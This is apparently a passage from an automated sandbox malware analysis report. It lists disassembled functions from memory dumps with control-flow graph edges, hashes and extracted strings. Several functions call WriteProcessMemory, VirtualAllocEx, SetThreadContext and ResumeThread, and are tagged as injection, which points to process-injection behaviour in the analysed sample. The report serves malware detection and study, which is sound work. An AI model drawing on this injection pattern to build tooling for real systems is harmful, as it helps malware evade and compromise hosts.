                                                                                        • Instruction ID: 23a25e3b87797f5d46aeea5b9c3fc0510d5ffb3478721159aa8026478b667dcc
                                                                                        • Opcode Fuzzy Hash: fce4d583e6964cc3a526a03b3c01f2fd746cf970c483feee97081e4b0602c436
                                                                                        • Instruction Fuzzy Hash: B491AF74E01218CFDB54DFA9D984A9DBBF2FF88300F108569E909AB365DB315986CF50
                                                                                        Function 054A7350 Relevance: .2, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62fcbbdc97ef8d0325ff0f9eb7134608fa3333e74918886d975a9c3cf4f2eaf7
                                                                                        • Instruction ID: 66b51908abcbbf7e37949e5e29662f3c11bfd7176ed1cedec8fa8342f91de92c
                                                                                        • Opcode Fuzzy Hash: 62fcbbdc97ef8d0325ff0f9eb7134608fa3333e74918886d975a9c3cf4f2eaf7
                                                                                        • Instruction Fuzzy Hash: 2881BF74E00218CFDB14DFA9D984A9DBBF2FF88300F108569E909AB365DB31A985CF40
                                                                                        Function 054A8898 Relevance: 6.6, Strings: 5, Instructions: 308COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 223 54a8898-54a88c2 225 54a88cb-54a88cf 223->225 226 54a88c4 223->226 227 54a88d1-54a88d5 225->227 228 54a88e6-54a8900 225->228 226->225 229 54a88db-54a88e3 227->229 230 54a8ba4-54a8baf 227->230 235 54a890b-54a890f 228->235 236 54a8902 228->236 229->228 237 54a8bb6-54a8c1a 230->237 238 54a891a-54a893e 235->238 239 54a8911-54a8917 235->239 236->235 258 54a8c21-54a8c85 237->258 246 54a8ad9-54a8aeb 238->246 247 54a8944-54a8956 238->247 239->238 250 54a8af3 246->250 247->237 252 54a895c-54a8960 247->252 253 54a8b95-54a8b9c 250->253 252->237 254 54a8966-54a8970 252->254 254->258 259 54a8976-54a897a 254->259 289 54a8c8c-54a8cf0 258->289 259->246 260 54a8980-54a8984 259->260 263 54a8993-54a8997 260->263 264 54a8986-54a898d 260->264 265 54a899d-54a89ad 263->265 266 54a8cf7-54a8d25 263->266 264->246 264->263 271 54a89af-54a89b5 265->271 272 54a89dd-54a89e3 265->272 287 54a8d2f-54a8d30 266->287 288 54a8d27-54a8d2b 266->288 276 54a89b9-54a89c5 271->276 277 54a89b7 271->277 273 54a89e7-54a89f3 272->273 274 54a89e5 272->274 279 54a89f5-54a8a13 273->279 274->279 278 54a89c7-54a89d7 276->278 277->278 278->272 278->289 279->246 290 54a8a19-54a8a1b 279->290 288->287 291 54a8d2d 288->291 289->266 292 54a8a1d-54a8a31 290->292 293 54a8a36-54a8a3a 290->293 291->287 292->253 293->246 296 54a8a40-54a8a4a 293->296 296->246 302 54a8a50-54a8a56 296->302 303 54a8b9f 302->303 304 54a8a5c-54a8a5f 302->304 303->230 304->266 306 54a8a65-54a8a82 304->306 311 54a8ac0-54a8ad4 306->311 312 54a8a84-54a8a9f 306->312 311->253 319 54a8aa1-54a8aa5 312->319 320 54a8aa7-54a8abb 312->320 319->246 319->320 320->253
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                        • API String ID: 0-3486158592
                                                                                        • Opcode ID: 84bf9088b86f5a3318b9e4de373e023a978a9537b7e573d02aff78b44beaf372
                                                                                        • Instruction ID: 32f23bb93d8afc0a40c46e76e56d41692bfb2fa77e97420fc23fe99345adbaf6
                                                                                        • Opcode Fuzzy Hash: 84bf9088b86f5a3318b9e4de373e023a978a9537b7e573d02aff78b44beaf372
                                                                                        • Instruction Fuzzy Hash: 0CC16931A002189FDB54DF69D958AAF7BF6FF98301F14846AE806A73A4DB34DC41CB91
                                                                                        Function 054AA069 Relevance: 6.5, Strings: 5, Instructions: 229COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 322 54aa069-54aa09e 323 54aaa18-54aaa23 322->323 324 54aa0a4-54aa3ca call 54a5950 * 3 call 54a59a0 call 54a5950 call 54a5a30 322->324 325 54aaa2c-54aaa37 323->325 326 54aaa25 323->326 367 54aa3cc 324->367 368 54aa3d1-54aa45c 324->368 325->323 326->326 367->368 379 54aa462 call 54ab46e 368->379 380 54aa462 call 54ab620 368->380 372 54aa468-54aa4b6 372->323 375 54aa4bc-54aa507 372->375 375->323 378 54aa50d-54aa519 375->378 378->323 379->372 380->372
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !$,$O$W$c
                                                                                        • API String ID: 0-600630442
                                                                                        • Opcode ID: 85fd1fab2af6d5cde0e3f0ce8cd71d4e2397af8a91733d52beee60567a4f6e85
                                                                                        • Instruction ID: 572b03fa86a5fe4fbf181407d8c89bd67fd3df9a0b106f82c83c2ed607ad8458
                                                                                        • Opcode Fuzzy Hash: 85fd1fab2af6d5cde0e3f0ce8cd71d4e2397af8a91733d52beee60567a4f6e85
                                                                                        • Instruction Fuzzy Hash: A3C18F74E052288FDBA4DF24CD54BD9BBB2FF88300F1091EA950DA7250DB796E948F81
                                                                                        Function 054A35BA Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 579 54a35ba-54a35fd 581 54a34de-54a34e9 579->581 582 54a3603-54a3a5e 579->582 583 54a34eb-54a4604 581->583 584 54a34f2-54a34fd 581->584 633 54a3a69-54a3a95 582->633 583->581 590 54a460a-54a461d 583->590 584->581 590->581 633->581
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 9$R$_
                                                                                        • API String ID: 0-541541022
                                                                                        • Opcode ID: dd3dc1f164980dd362c5ae96b5a16a82473497c41d34e4a628163362a236940a
                                                                                        • Instruction ID: e5c6b5506920cba04a53b81efaec367f9c72c8b2a8a903d688cc9ddc51c8958e
                                                                                        • Opcode Fuzzy Hash: dd3dc1f164980dd362c5ae96b5a16a82473497c41d34e4a628163362a236940a
                                                                                        • Instruction Fuzzy Hash: 70C1CD74D016288FDB64EF24CC40BAABBB2BF88301F1091EAD54DA7250DB365E95CF80
                                                                                        Function 054A7790 Relevance: 3.0, Strings: 2, Instructions: 489COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 635 54a7790-54a779b 636 54a7821-54a785e 635->636 637 54a77a1-54a77c9 635->637 644 54a78b3-54a78b5 636->644 645 54a7860-54a786a 636->645 647 54a77cb-54a77d4 637->647 648 54a7804-54a7808 637->648 645->644 652 54a786c-54a7889 645->652 647->648 655 54a77d6-54a77e4 647->655 650 54a780a-54a780d 648->650 651 54a7815-54a7820 648->651 650->651 652->644 659 54a788b-54a78b1 652->659 655->648 660 54a77e6-54a77fe 655->660 659->644 667 54a78b6-54a78f0 659->667 660->648 665 54a7800 660->665 665->648 673 54a791e-54a7924 667->673 674 54a78f2-54a7913 667->674 675 54a792a-54a792e 673->675 674->675 676 54a7915-54a791a 674->676 678 54a7930-54a7944 675->678 679 54a7947-54a796c call 54a7790 675->679 676->673 678->679 685 54a7989-54a7993 679->685 686 54a796e-54a7978 679->686 690 54a79c8-54a79f7 685->690 691 54a7995-54a799c 685->691 686->685 689 54a797a-54a7987 686->689 698 54a79ff-54a7a03 689->698 690->698 692 54a799e-54a79ad 691->692 693 54a79b3-54a79be 691->693 696 54a79af-54a79b1 692->696 697 54a7a06-54a7a54 692->697 701 54a79c6 693->701 696->698 707 54a7a6f-54a7a86 697->707 708 54a7a56-54a7a57 697->708 701->698 710 54a7a8c-54a7f88 707->710 709 54a7a59-54a7a6a 708->709 708->710 709->707
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Hbq$d8cq
                                                                                        • API String ID: 0-70480990
                                                                                        • Opcode ID: 100ada13bcc2f61bd9f95bd0d30077a42e85f6dbd1755b04b6604a4d7fe43a72
                                                                                        • Instruction ID: 3a1cdfe75a914bf4e53ab1eddfc7b589a75b3b195d936601dd884b51b999375c
                                                                                        • Opcode Fuzzy Hash: 100ada13bcc2f61bd9f95bd0d30077a42e85f6dbd1755b04b6604a4d7fe43a72
                                                                                        • Instruction Fuzzy Hash: 6F129538248315CFDB06FB74EA98B763B67FB84700F104928E4455B7ACEB35A885DB61
                                                                                        Function 00FB25E0 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 775 fb25e0-fb2607 776 fb2609 775->776 777 fb260e-fb262b 775->777 776->777 779 fb5409-fb5414 777->779 780 fb2631-fb280f 777->780 781 fb541d-fb5446 779->781 782 fb5416 779->782 811 fb2817-fb2842 780->811 781->779 785 fb5448-fb547b 781->785 782->782 785->779 789 fb547d-fb54c3 785->789 789->779 795 fb54c9-fb54ee 789->795 795->779 811->779
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,$\
                                                                                        • API String ID: 0-1562614511
                                                                                        • Opcode ID: 3413c8094e7f99509e446b7412833f332a54d229bf1d71e95bb1e75993972e60
                                                                                        • Instruction ID: 9198a9b93ba54d9fe3e781cc669aa78a18141afabb471e543dfe7dca30fc4db4
                                                                                        • Opcode Fuzzy Hash: 3413c8094e7f99509e446b7412833f332a54d229bf1d71e95bb1e75993972e60
                                                                                        • Instruction Fuzzy Hash: A981BE74D01229CFCB61DF24D8486E9BBB5AF48341F6085EAD809E3280EB355EE1DF16
                                                                                        Function 059BF9E8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 968 59bf9e8-59bfa53 970 59bfa6a-59bfacb WriteProcessMemory 968->970 971 59bfa55-59bfa67 968->971 973 59bfacd-59bfad3 970->973 974 59bfad4-59bfb26 970->974 971->970 973->974
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 059BFABB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: fad9839e5a69c662cc75bb6ad573d46c79fbbd8de92175e1a2fed9e47f4fb898
                                                                                        • Instruction ID: 91eeff9da73b7a357f5c6044d29cf608f396108ba7ab539817e16448f997addc
                                                                                        • Opcode Fuzzy Hash: fad9839e5a69c662cc75bb6ad573d46c79fbbd8de92175e1a2fed9e47f4fb898
                                                                                        • Instruction Fuzzy Hash: 564199B5D012589FDB00CFA9D984ADEFBF1BB49310F20902AE819B7250D775AA45CF64
                                                                                        Function 059BD2C8 Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 979 59bd2c8-59bd32b 981 59bd38a-59bd3e1 LoadLibraryA 979->981 982 59bd32d-59bd35a 979->982 985 59bd3ea-59bd42d 981->985 986 59bd3e3-59bd3e9 981->986 982->981 991 59bd35c-59bd361 982->991 989 59bd42f-59bd433 985->989 990 59bd43d 985->990 986->985 989->990 993 59bd435 989->993 994 59bd363-59bd36d 991->994 995 59bd384-59bd387 991->995 993->990 996 59bd36f 994->996 997 59bd371-59bd380 994->997 995->981 996->997 997->997 998 59bd382 997->998 998->995
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 059BD3D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 45b89b02469a0df99c64e3cd181747fb97b9445d06bb1c6f3412736abca38b43
                                                                                        • Instruction ID: 61adec4da5dae5880b37b005a7b595c0a2bcb0b4e94a064fed6c5691ccd32c78
                                                                                        • Opcode Fuzzy Hash: 45b89b02469a0df99c64e3cd181747fb97b9445d06bb1c6f3412736abca38b43
                                                                                        • Instruction Fuzzy Hash: 274122B0D003588FEB10CFA9D985BDDBBF2FB49304F109229E815AB295D7B4A845CF85
                                                                                        Function 059BF890 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 999 59bf890-59bf94a VirtualAllocEx 1002 59bf94c-59bf952 999->1002 1003 59bf953-59bf99d 999->1003 1002->1003
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059BF93A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 9ffd6722c59533e1992e30ae27fdf66793df7fddc589225860d423666a846126
                                                                                        • Instruction ID: d05de113490064cd1c41f0fb05ac31659d43c3a97c287c2bba1813dd5dcf1f8e
                                                                                        • Opcode Fuzzy Hash: 9ffd6722c59533e1992e30ae27fdf66793df7fddc589225860d423666a846126
                                                                                        • Instruction Fuzzy Hash: 2C31A8B8D002589FCF10CFA9D980ADEFBB1FB49310F10942AE815B7210D775A946CF58
                                                                                        Function 059BF688 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 059BF737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: d82bb62dfdb8fa9d0e2a1a6d3d5ea49267e3dc47ac04800f3f9713b47331fdd6
                                                                                        • Instruction ID: 7c78d4e6f7f3f47d00a093f6595a187251c91ed8e89d1d9e7c776bc6bef851eb
                                                                                        • Opcode Fuzzy Hash: d82bb62dfdb8fa9d0e2a1a6d3d5ea49267e3dc47ac04800f3f9713b47331fdd6
                                                                                        • Instruction Fuzzy Hash: 1A31BBB4D002589FDB10CFAAD984AEEFBF1BB49310F24806AE415B7250C778A985CF54
                                                                                        Function 059BCFF0 Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 059BD097
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 29a7179fd8b362604d99c88be8ea30137472f77aad9fd33b39b581aa3ece9048
                                                                                        • Instruction ID: de53e4ea4b145041372a32986379caab1cff157727e54ef7ffb20811b0566336
                                                                                        • Opcode Fuzzy Hash: 29a7179fd8b362604d99c88be8ea30137472f77aad9fd33b39b581aa3ece9048
                                                                                        • Instruction Fuzzy Hash: F53177B9D042589FCB10CFA9E584ADEFBB5BB19310F24902AE814B7310D775A945CF68
                                                                                        Function 059BF160 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 059BF1DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: ca02226593e3bf58af0b64bcbd81969e56b0bb0fe01e298d78c85c7712667228
                                                                                        • Instruction ID: ae71c5ed41dcb908b0d51ddd6e20c05b07f928b2a343bccd0cf5646591192d05
                                                                                        • Opcode Fuzzy Hash: ca02226593e3bf58af0b64bcbd81969e56b0bb0fe01e298d78c85c7712667228
                                                                                        • Instruction Fuzzy Hash: 0E31A9B4D012189FDB14CFA9DA85ADEFBB5BB49310F10942AE815B7210C775A941CFA8
                                                                                        Function 00FB25D1 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ,
                                                                                        • API String ID: 0-3772416878
                                                                                        • Opcode ID: 68a60c8f2e33d51ca59d3aead4aedcf19f2b843280b52adeb3539d16628de380
                                                                                        • Instruction ID: bdde57ea18c8bb307067f2abf9d341f2e74833eda8a45756955050072f73f49c
                                                                                        • Opcode Fuzzy Hash: 68a60c8f2e33d51ca59d3aead4aedcf19f2b843280b52adeb3539d16628de380
                                                                                        • Instruction Fuzzy Hash: 6061FF74D052298FCB61EF24D854AE9BBB6AF49301F5045EAD809E3390EB315EE1DF06
                                                                                        Function 059BE390 Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 059BE431
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1708172497.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_59b0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 3782f64c3d062d7fede4399954c58f99bc5b54e42e34ff5a2cc3adf520b3b10b
                                                                                        • Instruction ID: 6565649b9c6228ccb8e17abdee1e776e9a707ac20a8463ed91be4daf33f7b106
                                                                                        • Opcode Fuzzy Hash: 3782f64c3d062d7fede4399954c58f99bc5b54e42e34ff5a2cc3adf520b3b10b
                                                                                        • Instruction Fuzzy Hash: B03177B8D002589FDB10CFA9D984ADEFBB5BB19310F10902AE815B7310D775A945CF69
                                                                                        Function 054AE6B8 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: lo7p
                                                                                        • API String ID: 0-3544042162
                                                                                        • Opcode ID: 81edb48b221d17bc02e9766295fa3abf0894c7f93fbd4c6c812b5a039d6ad1f5
                                                                                        • Instruction ID: 9c91f5f49294b63a4af85a17c011a6b03be8622d5d4ad49c7eedf55b8476a4dc
                                                                                        • Opcode Fuzzy Hash: 81edb48b221d17bc02e9766295fa3abf0894c7f93fbd4c6c812b5a039d6ad1f5
                                                                                        • Instruction Fuzzy Hash: 3E418E78E012199FCB44DFA9D9849DEBBF2FF89300F20906AE915A7360DB35A901CF50
                                                                                        Function 00FB6983 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 95ee0a111bf18b501b5261e2fa045a6205909f4f0b59a091be93b0dfd677c3dc
                                                                                        • Instruction ID: efca13a7bf11915122cfff89837763acf94e0a67ab18212fead4af74d51a8198
                                                                                        • Opcode Fuzzy Hash: 95ee0a111bf18b501b5261e2fa045a6205909f4f0b59a091be93b0dfd677c3dc
                                                                                        • Instruction Fuzzy Hash: 44F0C4B1D056288FEBA8CF29C8847D9BBF1BF09301F1081E9D10DA3240EB340AC18F01
                                                                                        Function 054AB46E Relevance: .2, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e030de06ee9574fcd6bdda7a83ac67b7dedb88fa0e606cfa6cc6ef5bc05279b4
                                                                                        • Instruction ID: ae0418aab58a3c5ac145f41186c7a0c1655d0eee29130f361bfa93e81084e469
                                                                                        • Opcode Fuzzy Hash: e030de06ee9574fcd6bdda7a83ac67b7dedb88fa0e606cfa6cc6ef5bc05279b4
                                                                                        • Instruction Fuzzy Hash: F851CA63499A449BCBC1CA51CC867CC7B71EAF5224BCACB87A454DFF16D32DCC428A91
                                                                                        Function 00E3D01C Relevance: .1, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690484336.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_e3d000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3513fc4f0363c968c0a7ff00624135e883ef85fe2a86431557edcd8db9669d11
                                                                                        • Instruction ID: ab12a31ca52c5249003ebaa1b53ad1c4170edd71d1aeb4b048ca9eafb693fcfa
                                                                                        • Opcode Fuzzy Hash: 3513fc4f0363c968c0a7ff00624135e883ef85fe2a86431557edcd8db9669d11
                                                                                        • Instruction Fuzzy Hash: 6B212571108240DFCB19DF14EDC8B27BFA6FB84B14F20C569E9095B246C336D84ACAA2
                                                                                        Function 00E3D005 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690484336.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_e3d000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e693db348823eacb59d13d69e45ff58ce35b113e6d5e61f815c9ea55b9b78c1b
                                                                                        • Instruction ID: 8afcbde14da80126eaf94c0fcf0d88506fffddefa4f3f77920571e83eb2998b5
                                                                                        • Opcode Fuzzy Hash: e693db348823eacb59d13d69e45ff58ce35b113e6d5e61f815c9ea55b9b78c1b
                                                                                        • Instruction Fuzzy Hash: 7E21AF711093C08FCB06CF24D994B16BF72EB86714F2981EAD8448B653C33A980ACB62
                                                                                        Function 054A76D8 Relevance: .1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706073905.00000000054A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_54a0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 44ff36918c11a7893619db64ec523a6422250da7dc0804583cc964e91a428ceb
                                                                                        • Instruction ID: 7517fc64dede2ffd4ae749c0a4c27ac538c350bc52b3a0ea9122a0fc613837a2
                                                                                        • Opcode Fuzzy Hash: 44ff36918c11a7893619db64ec523a6422250da7dc0804583cc964e91a428ceb
                                                                                        • Instruction Fuzzy Hash: 1D116ABAE002199FCB11DFA9D841AEFBBB5FB88211F00402BE915E3241D3749A15CBE0
                                                                                        Function 00FB515B Relevance: .0, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: db17bc49e7b75b0a691e3b764d77ae215e4444f7b228771807df4b5380ed6a5a
                                                                                        • Instruction ID: 8e859a26f9ea89402ce0fc2aa67dd066e54b24396e876aa1de06d6c9eccd1430
                                                                                        • Opcode Fuzzy Hash: db17bc49e7b75b0a691e3b764d77ae215e4444f7b228771807df4b5380ed6a5a
                                                                                        • Instruction Fuzzy Hash: 9B117B78D05228CBDB24CF25D8906D8BBB2FB49341F2094EAD41DA3650EB355EC2AF41
                                                                                        Function 00FB1621 Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690706765.0000000000FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ebc2eabfb41828034ad74f83d414055d8a5fa85766750389166cd3d893968e63
                                                                                        • Instruction ID: d873b9055d1a163d786c5db034eaefa7c45f06be7b79bd46eea31c5dfc80959c
                                                                                        • Opcode Fuzzy Hash: ebc2eabfb41828034ad74f83d414055d8a5fa85766750389166cd3d893968e63
                                                                                        • Instruction Fuzzy Hash: 90F0E260C0A244AFC702CF75A81AFA57FB9AB07314F84849AD405A7192D6310918DB56
                                                                                        Function 054A7650 Relevance: .0, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
